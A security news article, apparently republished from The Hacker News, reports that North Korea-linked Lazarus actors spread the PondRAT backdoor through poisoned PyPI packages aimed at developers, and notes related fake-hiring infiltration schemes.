North Korean Hackers Deploy PondRAT via Poisoned Python Packages in Supply Chain Attacks
Researchers from Palo Alto Networks Unit 42 have identified North Korean-affiliated threat actors using compromised Python packages to distribute a new malware strain called PondRAT. This discovery comes as part of an ongoing campaign aimed at developers, further revealing the evolving tactics of North Korea’s Lazarus Group.
PondRAT, believed to be a streamlined version of the macOS backdoor POOLRAT (also known as SIMPLESEA), has surfaced as the latest tool in cyber espionage operations linked to the Lazarus Group. These operations have previously targeted macOS users, with notable incidents such as the 3CX supply chain attack last year.
The campaign is an extension of Operation Dream Job, a long-running effort where attackers pose as recruiters offering enticing job opportunities to lure targets into downloading malware. The attackers exploit Python Package Index (PyPI), a trusted repository for Python developers, by uploading poisoned packages designed to infect development environments.
The Poisoned Python Packages
Unit 42 researchers, led by Yoav Zemah, found that the adversaries uploaded several malicious Python packages to PyPI. These packages, disguised as legitimate open-source projects, are engineered to deliver PondRAT to unsuspecting developers. The packages, now removed from PyPI, include:
- real-ids (893 downloads)
- coloredtxt (381 downloads)
- beautifultext (736 downloads)
- minisound (416 downloads)
See Also: So, you want to be a hacker?
Offensive Security, Bug Bounty Courses
Discover your weakest link. Be proactive, not reactive. Cybercriminals need just one flaw to strike.
Once downloaded, these packages execute a second-stage payload that fetches the malware from a remote server, targeting Linux and macOS systems.
The threat actor behind this campaign has been identified as Gleaming Pisces, also known as Citrine Sleet, Labyrinth Chollima, Nickel Academy, and UNC4736—a sub-cluster within the Lazarus Group. They are notorious for distributing the AppleJeus malware, a sophisticated tool used in cryptocurrency theft and espionage operations.
Malware Capabilities and Objectives
PondRAT is described as a lighter version of POOLRAT, designed with enhanced capabilities for both Linux and macOS platforms. It includes functionality to upload and download files, execute arbitrary commands, and pause operations based on preconfigured time intervals. The malware’s core components resemble those of POOLRAT, particularly in how it processes commands from its command-and-control (C2) server.
The Linux and macOS variants of POOLRAT share an almost identical structure in their configuration loading mechanisms, with method names and functionality being strikingly similar across both platforms. This continuity across different operating systems suggests that Gleaming Pisces has been refining its toolkit to enhance its reach and effectiveness.
Supply Chain Compromise and Developer Targeting
The strategic targeting of software developers through poisoned Python packages is part of a broader goal to gain access to supply chain vendors. By compromising developers’ endpoints, the attackers can infiltrate vendor networks and ultimately reach the customers of these vendors—similar to the infamous 3CX incident.
This attack method poses significant risks, as successful installation of malicious packages in development environments can lead to widespread compromise within an organization’s network. Once inside, the malware can provide attackers with remote access, enabling data theft, espionage, and further propagation through the network.
Trending: Offensive Security Tool: DDoSlayer
North Korean Threat Actors Targeting Tech Industry
The disclosure of PondRAT’s deployment follows reports from KnowBe4, a cybersecurity company, revealing that North Korean operatives have infiltrated various tech companies by submitting fake resumes and getting hired. This activity, known as Famous Chollima and tracked by CrowdStrike, highlights North Korea’s growing efforts to exploit the global trend of remote work. The threat actors target organizations by posing as highly skilled developers, gaining employment, and then using their access to conduct espionage.
KnowBe4 warned that more than a dozen companies have been affected by this industrial-scale operation, which is believed to be state-sponsored. It underscores the increasing risk organizations face when hiring remote employees, particularly in industries handling sensitive data or intellectual property.
Are u a security researcher? Or a company that writes articles about Cyber Security, Offensive Security (related to information security in general) that match with our specific audience and is worth sharing? If you want to express your idea in an article contact us here for a quote: [email protected]
Source: thehackernews.com
Recent News
Offensive Security & Ethical Hacking Course
Begin the learning curve of hacking now!
Information Security Solutions
Find out how Pentesting Services can help you.
